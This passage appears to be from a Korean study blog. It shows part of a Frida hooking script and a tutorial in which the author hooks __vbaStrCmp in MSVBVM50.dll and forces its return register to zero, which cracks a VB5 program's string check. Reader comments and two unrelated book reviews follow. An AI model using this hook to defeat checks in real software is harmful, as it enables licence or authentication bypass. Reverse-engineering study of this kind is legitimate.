            console.log('===============================================================================');
            console.log('[+] Called __vbaStrCmp!! [' + __vbaStrCmp + ']');
            console.log('[+] args[0] = [' + args[0] + ']');
            dumpAddr('args[0]', args[0], 0x16); 
            console.log('[+] args[1] = [' + args[1] + ']');
            dumpAddr('args[1]', args[1], 0x16);
        },
        // When function is finished
        onLeave: function (retval) {
            console.log('===============================================================================');
            
            /*
                It doesn't work !
            console.log('[+] (Origin) Returned from __vbaStrCmp: ' + typeof(retval));
            console.log('[+] (Origin) Returned from __vbaStrCmp: ' + retval);
            retval = 0;
            console.log('[+] (forgery) Returned from __vbaStrCmp: ' + typeof(retval));
            console.log('[+] (forgery) Returned from __vbaStrCmp: ' + retval);
            */

            this.context.eax = 0x0;
            console.log('Context information:');
            console.log('Context  : ' + JSON.stringify(this.context));
            //console.log('Return   : ' + this.returnAddress);
            //console.log('ThreadId : ' + this.threadId);
            //console.log('Depth    : ' + this.depth);
            //console.log('Errornr  : ' + this.err);
            console.log('===============================================================================');
        }
    });
    // Print out data array, which will contain de/encrypted data as output
    function dumpAddr(info, addr, size) {
        if (addr.isNull())
            return;
        console.log('Data dump ' + info + ' :');
        var buf = Memory.readByteArray(addr, size);
        // If you want color magic, set ansi to true
        console.log(hexdump(buf, { offset: 0, length: size, header: true, ansi: false }));
    }
    function resolveAddress(addr) {
        // Enter the base address of dll as seen in your favorite disassembler (here IDA)
        var idaBase = ptr('0x77EC0000');
        // Calculate offset in memory from base address in IDA database 
        var offset = ptr(addr).sub(idaBase);
        // Add current memory base address to offset of function to monitor 
        var result = baseAddr.add(offset); 
        // Write location of function in memory to console
        console.log('[+] New addr=' + result); 
        return result;
    }
""")
 
    script.on('message', on_message)
    script.load()
    print("[!] Ctrl+D on UNIX, Ctrl+Z on Windows/cmd.exe to detach from instrumented program.\n\n")
    sys.stdin.read()
    session.detach()
    
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("this script needs pid or proc name :(")
        sys.exit(1)
 
    try:
        target_process = int(sys.argv[1])
    except ValueError:
        target_process = sys.argv[1]
    main(target_process)
cs

Frida공식 홈페이지를 방문하면 기본적인 틀에 대한 설명과 예제 코드를 볼 수 있습니다. 저 역시 아래 링크의 폼에서 수정을 하며 완성을 시켰습니다.

[링크] https://www.frida.re/docs/examples/windows/


2-1 후킹 메서드 주소 찾기

먼저, 해당 __vbaStrCmp 메서드 주소를 찾는 방법입니다.

var baseAddr = Module.findBaseAddress('MSVBVM50.dll');

const __vbaStrCmp = Module.findExportByName("MSVBVM50.dll", "__vbaStrCmp");


위 코드를 실행할 때는 python script_name.py [PID] 로 실행하게 됩니다. 프로세스를 타겟팅해서 attach 하는 것이지요

타겟 프로세스에서 로드되어있는 dll의 주소를 찾기 위해서는 findBaseAddress()를 사용하여 찾을 수 있습니다.


그리고 우리가 후킹을 걸기 위해 필요한 함수의 주소는 findExportByName("dll명", "함수명") 으로 찾을 수 있죠

따라서 const __vbaStrCmp = Module.findExportByName("MSVBVM50.dll", "__vbaStrCmp"); 이 코드가 실행되고 나면 __vbaStrCmp의 주소가

변수에 담기게 됩니다.


프로세스 내부에 존재하는 사용자 정의함수 같은 경우에는 var print_log = resolveAddress('0x0043FC34'); 와 같은 형식으로 얻어와야합니다.

resolveAddress()에 IDA에서 확인한 주소 값(sub_xxxxxxxx)을 인자로 전달해주고, resolveAddress함수 안에 idaBase변수에 IDA에서 사용한 베이스 주소를 입력해준 후 사용해야 합니다.


2-2 onEnter

타겟 함수에 제대로 attach가 되었다면 이제 값을 자유롭게 보고, (권한이 허용되는 한)조작할 수 있습니다.

1
2
3
4
5
6
7
8
9
onEnter: function (args) {
            console.log('===============================================================================');
            console.log('[+] Called __vbaStrCmp!! [' + __vbaStrCmp + ']');
            console.log('[+] args[0] = [' + args[0+ ']');
            dumpAddr('args[0]', args[0], 0x16); 
 
            console.log('[+] args[1] = [' + args[1+ ']');
            dumpAddr('args[1]', args[1], 0x16);
}
cs

onEnter에서는 args변수로 함수 인자 값들을 확인해 볼 수 있습니다. 지금은 두 인자 값이 포인터로 전달이 되기 때문에 hexdump를 떠서 

확인해보고있습니다.


2-3 onLeave

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
onLeave: function (retval) {
    console.log('===============================================================================');
            
    /*
    It doesn't work !
    console.log('[+] (Origin) Returned from __vbaStrCmp: ' + typeof(retval));
    console.log('[+] (Origin) Returned from __vbaStrCmp: ' + retval);
    retval = 0;
    console.log('[+] (forgery) Returned from __vbaStrCmp: ' + typeof(retval));
    console.log('[+] (forgery) Returned from __vbaStrCmp: ' + retval);
    */
    this.context.eax = 0x0;
    console.log('Context information:');
    console.log('Context  : ' + JSON.stringify(this.context));
    //console.log('Return   : ' + this.returnAddress);
    //console.log('ThreadId : ' + this.threadId);
    //console.log('Depth    : ' + this.depth);
    //console.log('Errornr  : ' + this.err);
    console.log('===============================================================================');
}
cs

__vbaStrCmp는 문자열 비교 결과 일치하는 경우 0을 리턴하고 다른경우 -1을 리턴하는 것으로 보입니다.

따라서 1차 적으로는 retval 을 0 으로 만들어 주었었는데요, 확인을 해보니 retval이 바뀌었지만 제대로 동작하지 않는 모습을 보였습니다.

왜인지는 모르겠어요ㅠㅠ


이후에 함수의 리턴값을 저장하는 eax의 값을 확인해보니 0xffffffff로 -1이 저장되고 있는 것을 확인하였고, 

this.context.eax = 0x0; 로 eax값을 0으로 만들어 준 후 정상적으로 크래킹된 것을 볼 수 있었습니다.



끗!

'Study > Windows' 카테고리의 다른 글

Windows Hooking(Frida)  (4) 2018.01.30
  1. Juice 2018.10.05 14:09

    와 프리다 분석에 정말 많은 도움됐습니다. 감사합니다. 10000따봉 박고갑니다!

    • JSBach Bach 2018.10.27 00:02 신고

      감사합니다~
      최근에 알게된 것을 덧붙혀드리자면
      args는 stack에 있는 값을 가져오는 것같습니다. 콜 방식에 따라 인자 값을 레지스터에서 가져와야 할 수도있단 말이죠,

      return 값도 eax에 있는 값을 참조해서 뿌려주는 것 같습니다.

  2. Juice 2018.10.30 10:26

    저의경우 onLeave에서 retval=0; 을 하면 정상적으로 반환값이 변조되는데 context로 eai 변조할 수 있는건 처음 알았네요!
    다시 보다가 또 따봉드리고갑니다!

  3. Juice 2018.10.30 10:30

    아 저는 retval.replace(0); 으로 하였습니다!..

안녕하세요! 벌써 두 번째 책 후기 포스팅을 남기게 되었네요.

이번에 포스팅 할 책은 지난 번 포스팅에 이어 채사장님의 책 우리는 언젠가 만난다 입니다.





1. 계기

읽게된 계기는 역시 채사장님의 신간이기 때문에 집어든 이유가 가장 컸지요. 지금까지 읽어본 채사장님의 책들 모두 마음에 들었었고

때문에 이번에 나온 신간도 마음에 들 거란 기대감에요.


개인적으로 채사장님이 지금까지 쓰신 책들을 크게 두 부류(?)로 나누어 본다면 전에 포스팅 했던 시민의 교양과 같은 사회에 대한 내용에 대해 서술한 부분에 한 부류, 다른 한 부류는 오늘 포스팅 할 우리는 언젠가 만난다, 바로 전에 출간하신 열한 계단과 같은 자아와 세계에 대해 쓴 부류 이렇게 두 가지가 있는 것 같아요. 전 개인적으로 사회에 대해 관심이 많아 전자는 이미 관심이 있는 상태였고 후자는 채사장님의 책들을 읽으면서 생각해보게 되었고 또 재미를 느끼게 된 거 같아요. 


2. 내용

책은 겉 표지에 써져있는 대로 나와 타인 그리고 나와 세계가 어떤 관계를 맺고 있는지 또한 어떤 방식으로 소통하고 있는 지에 대해 이야기를 해주고 있습니다. 그리고 종국에는 책의 제목처럼 우리는 언젠가 만난다 라는 이야기로 끝을 맺지요.


이 책에서 제가 인상 깊었던 이야기를 몇 가지만 또 뽑아볼까 합니다.


- 소년병의 이야기

소년병의 이야기는 나와 타인의 관계에 대한 부분을 풀어 낸 이야기입니다. 개인적으로 이 이야기가 채사장님이 직접 쓰신 부분인지, 아니면 다른 곳에서 인용하신 지는 잘 모르겠으나 정말 마음에 드는 이야기였습니다.


나와 타인이 맺는 관계 특히나 연인 관계에서 누구나 한번 쯤은 해봤음 직한 실수들에 대해 엮어 놓은 느낌이랄까요. 

소년병과 어느 오두막을 지키고 있는 여인이 만들어내는 이 이야기는 만남부터 헤어짐 그리고 그 후까지 생각해보게 만듭니다.



- 낡은 벤치를 지키는 두 명의 군인 이야기

세계와 나의 관계에 대한 이야기 중 등장하는 이 이야기는 관례와 관습에 대해 생각해보게끔 이끌어주는 이야기입니다.

저 역시 마찬가지이고 많은 사람들이 잘 모르는 어떤 일을 할 때엔 앞 사람이 처리 해왔던 대로 똑같이 하려고 하는 경향이 강할 것이라고 생각합니다.

잘 모르는 상태로 위험을 감수하기 보다는 관례와 관습에 따라 안전한 길을 선택하는 것이죠. 하지만 이 에피소드를 읽고나면 이런 선택에 대해 다시 생각해 볼 수 있을 거라고 생각합니다. 


이 부분을 다 읽고 내가 소중히 지키고 있는 것들 중에 낡은 벤치가 있지는 않을까 하고 생각해보았습니다.



 - 결론을 향하여

부제 그대로 결론을 도출해 나갑니다. 우리가 왜 언젠가 만나게 되는지...

채사장님이 나는 누구인가, 세계는 무엇인가, 우리는 왜 존재하는가 에 대해 논리적으로 풀어낸 이 내용들과 과정들이 너무 재미있어서 

뽑아봤습니다. 또한 전에 들어본 적도 없고 제가 고려해보지 못한 관점이기 때문에 신선했습니다.


이 책의 결론대로라면 제목처럼 우리는 언젠가 만납니다. 각자의 여행을 마치고 만날 우리는 어떤 모습으로 만나게 될까요?


3. 마무리

책을 다 읽고 마지막 장을 덮었을 때, 나중에 다시 보고싶은 책이 있습니다.

책이 나에게 해주고 싶은 이야기가 있는 것 같은데 내가 아직 그 이야기를 들을 준비가 되어 있지 않아서 온전히 이해 못하는 것 같은 느낌이 드는 책이 

그렇습니다.


우리는 언젠가 만난다고 이야기하고 있는 이 책 역시 저에게 더 많은 이야기를 전달해주려고 했지만 이번에는 다 못들은 느낌이네요. 

나중에 이야기를 들을 준비가 되었다고 생각이 들 때, 다시 읽어 보고 싶은 책입니다.

 

'일상 > BooK' 카테고리의 다른 글

라틴어 수업 - 나는 공부하는 노동자입니다.  (0) 2018.03.22
죄와 벌  (0) 2018.02.26
우리는 언젠가 만난다.  (0) 2018.01.15
시민의 교양  (0) 2018.01.11

올해다짐했던 책리뷰 포스팅을 처음으로 시도해봅니다. 처음이니만큼 글의 구성을 어떻게 해야할 지 막막하지만.. 

늘 그랬듯이 써지는대로, 그냥 마음대로 써보려고 합니다. 책리뷰 그 첫 번째 책은 채사장님의 시민의 교양입니다.


1. 읽게된 계기..

팟캐스트 "지적 대화를 위한 넓고 얕은 지식" 을 즐겨 들으며 자연스레 채사장님을 알게 되었습니다. 제목처럼 다양한 지식들을 얕게 한번 파보는 

팟캐스트인데요, 이 내용들을 정리한 책도 있답니다.


저는 두 책 중에 왼쪽에 있는 1편밖에 읽어보지 못했습니다. 역사, 경제, 정치, 사회, 윤리에 대해 말하고 있는 이 책은 이해하기 쉽도록 

구성이 되어있습니다. 적절한 예시와 단순한 설명으로 정말 마음에 들었던 책이였죠. 


이후 채사장님이 쓰신 책들은 다 읽어볼 가치가 있겠다 싶어 그즈음 신간이였던 "열한 계단"을 읽었고 자연스럽게 '시민의 교양도 꼭 읽어봐야지' 라는 

생각이 들어 읽어보게 되었습니다.  이 글을 쓰는 지금은 "우리는 언젠가 만난다" 를 읽고 있는 중입니다. 아마 다음 포스팅 책이 되지 않을까 하고 

생각하고 있습니다.


2. 내용

사회는 굉장히 복잡한 이해관계 속에서 다양한 상황이 일어나기 때문에 쉽게 이해 할 수 없습니다. 이러한 이해관계는 어떻게 발생하였으며 

어떤식으로 드러나게 될까요? 아마 이 책을 읽기 전이었다면 추상적이고 두루뭉술한 이야기를 하였거나, 잘 모르겠다. 라는 대답을 했을 것 같습니다.


이 책은 세금, 국가, 자유, 직업, 교육, 정의, 미래의 카테고리를 가지고 세상을 보다 단순하게 바라볼 수 있는 시야를 가지게 해주었습니다. 그리고 언론 혹은 정치인들이 사용하던 어휘나 말들의 참 뜻에 대해서 조금은 이해 할 수 있게 된 것 같습니다. 

가장 인상 깊었던 카테고리를 두 가지 정도 뽑아보자면 바로 직업교육입니다.


- 직업

세상에 수 많은 직업이 있지만 이 책에서는 단 네 가지로 나누어 설명해줍니다. 


투자가, 자본가, 비임금노동자, 임금노동자


각 직업이 어떻게 발생을 하였는 지 어떤면에서 유리하고 어떤 부분에서 불리한 지에 대해 역시 단순한 예시와 쉬운 설명으로 이해를 도와줍니다.

이 카테고리가 인상깊었던 이유는 도입부에 있습니다. 비서실장과 시민의 대화에서 직업의 본질에 대해서 이야기 하는 부분이였는데요, 


시민은 직업을 선택 할 때 흔히 잘하는 일 혹은 좋아하는 일에 따라 고민을 한다라고 생각하지만 "산업화 사회에서 그런건 없다." 라고 이야기 합니다. 

그리고 이어서 "운동화 생산라인에서 일하는 사람은 좋아하는 일을 선택한 것입니까 잘하는 일을 선택한 것입니까?" 라는 질문을 던집니다. 


이 문장을 읽고 정말 많은 생각을 하게 되었습니다. 그리곤 직업이란 개념에 대해서 내가 뭔가를 놓치고 있구나 라고 생각하게 되었죠. 

요즘은 잘 모르겠습니다만, 제가 초등학교에 다니던 시절 학교에서 직업에 대해서 설명할 때 크게 두 가지 의미를 갖는다고 배웠던 것 같습니다. 


소득. 

자아실현의 의미.


오늘 날 구조에서 과연 직업이 저러한 의미를 갖는가? 에 대해 진지하게 고민을 하게되었습니다.


- 교육

교육 카테고리에서는 무엇을 어떻게 가르칠 것인가? 에 대한 내용을 다룹니다. 그리고 덴마크의 교육제도에 대해 설명한 부분도 재미있게 읽었습니다. 

여기서 인상 깊었던 점은 경쟁의 정당성에 대해 이야기 한 부분입니다. 우리나라는 교육을 통해 경쟁이 자연스럽게 학습되고 그 결과를 받아들이는 것 또한 정당한 것으로 학습시킵니다. 결과적으로 사회의 구조적인 문제로 발생한 문제 또한 경쟁에서 밀려났기때문이라고 생각하게끔 만들죠.


우리나라 내신제도에서 중간 정도 등수를 기록한 학생은 내신 5등급을 받게 됩니다. 내신 5등급을 받은 학생은 흔히들 이야기하는 sky를 포함한 "인서울"로 표현되는 대학들을 가지 못하게됩니다. 그리고 그 영향을 받아 취업경쟁에서도 대기업을 가기 힘들어집니다.

우리나라 경제인구를 100명으로 줄을 세웠을 때 경제소득순위 50등에 있는 사람의 연봉은 1074만원으로 한달에 90만원 정도가 됩니다. 물론 내신 5등급을 받은 학생이 반드시 연봉 1074만원을 받게되는 것은 아니겠지만, 분명 큰 영향을 받게 되는 것은 인정할 수 밖에 없죠.


이 책과 같이 제가 말하고자 하는 것은 중간정도의 노력을 한 사람이 중간정도의 소득을 얻지 못하는 현상은 사회의 문제로 봐야할 것이지 당연히 경쟁에서 밀렸기 때문으로 치부할 수 없다는 것입니다. 이러한 문제에 대해 여러분은 어떻게 생각하시나요?


3. 마무리..

이 책을 읽기 전과 후 사회를 보는 시야가 많이 바뀐 것 같다고 스스로 생각이 듭니다. 비교적 좀 더 단순하게 보고 이해하게 될 수 있게 되었으며, 

생각해 볼 거리가 많이 늘어났습니다. 세금, 국가, 자유, 직업, 교육, 정의, 미래에 대해 막연하고 어렵게 느껴지신다면 

꼭 한번 읽어 보셨으면 좋겠습니다.


쉽고 간단하게 그러나 중요한 것은 놓치지 않는 선에서 잘 설명을 해놓은 책이니까요. 


'일상 > BooK' 카테고리의 다른 글

라틴어 수업 - 나는 공부하는 노동자입니다.  (0) 2018.03.22
죄와 벌  (0) 2018.02.26
우리는 언젠가 만난다.  (0) 2018.01.15
시민의 교양  (0) 2018.01.11

+ Recent posts